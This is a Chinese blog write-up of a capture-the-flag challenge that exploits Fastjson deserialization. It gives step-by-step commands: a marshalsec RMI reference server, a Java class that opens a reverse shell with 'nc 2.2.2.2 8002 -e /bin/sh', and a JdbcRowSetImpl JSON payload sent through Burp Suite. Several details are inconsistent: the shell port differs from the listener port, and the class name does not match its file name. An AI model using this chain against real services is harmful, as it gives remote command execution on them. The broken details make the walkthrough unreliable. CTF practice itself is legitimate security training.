编程语言
首页 > 编程语言> > Java Fastjson Unserialize WriteUp

Java Fastjson Unserialize WriteUp

作者:互联网

Java Fastjson Unserialize

题目地址: https://ctf.bugku.com/challenges/detail/id/339.html

1. 查看网页源代码

<script type="text/javascript">
    function formSubmit(){
        var data=new Object();
        data.user=document.getElementById('user').value;
        data.pwd=document.getElementById('password').value;
        var json=JSON.stringify(data);

        var httpRequest = new XMLHttpRequest();
        httpRequest.open('POST', '/login', true);
        httpRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        httpRequest.send(json);

        httpRequest.onreadystatechange = function () {
            if (httpRequest.readyState == 4 && httpRequest.status == 200) {
                var responseText = httpRequest.responseText;
                data.pwd=document.getElementById('response').innerHTML=responseText;
            }
        };
    }
</script>

可以看到点击登陆按钮提交后post方式 跳转到 /login 界面 这就是我们要构造的http请求头

2. 搭建攻击环境

2.1 搭建java RMI服务

cd  #到家目录

#创建 fastjson-test目录
mkdir fastjson-test

#进入fastjson-test目录
cd fastjson-test

# 克隆marshalsec
#git clone https://github.com/mbechler/marshalsec

#我已经上传到gitee 用wget下载即可 上面的命令可以跳过
#没有下载wget 请自行下载安装wget
wget https://gitee.com/kittysmith5/log4j2/raw/master/rmi/marshalsec-0.0.3-SNAPSHOT-all.jar

2.2 创建一个执行反弹shell命令的java类

#还是在 fastjson-test 目录
touch Test.java

#编辑Test.java
vim Test.java

Test.java内容如下

import java.lang.Runtime;
import java.lang.Process;

public class test {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            //2.2.2.2改成自己云服务器的公网ip
            String commands = "nc 2.2.2.2 8002 -e /bin/sh";
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
			System.out.println("error!");
        }
    }
}

编译Test.java

javac Test.java

会在当前目录生成一个Test.class的文件, 待会有大用!

2.3 新开一个shell终端用python启动一个http服务

sudo python3 -m http.server

2.4 新开一个shell终端启动RMI服务监听9999端口

将2.2.2.2改为自己的公网ip! #Test对应Test.java

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://2.2.2.2:8000/#Test" 9999

2.5 新开一个shell终端nc监听8008端口

nc -lvn 8008

3. kali下使用burpsuite进行攻击

http请求头如下

POST /login HTTP/1.1

Host: 114.67.175.224:19692

Connection: close

Cache-Control: max-age=0

Content-Type: application/x-www-form-urlencoded

DNT: 1

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.57

Accept: */*

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6

If-Modified-Since: Fri, 03 Dec 2021 07:30:50 GMT

Content-Length: 271



{

    "user":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

    "password":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"rmi://2.2.2.2:9999/Test",

        "autoCommit":true

    }

}

image-20211216220757697

没有回应就是成功吗, 回到nc监听的shell终端页面,

输入cd / 和cat flag就能得到flag

标签:Fastjson,httpRequest,Java,java,WriteUp,fastjson,test,Test,2.2
来源: https://www.cnblogs.com/ktsm/p/15700289.html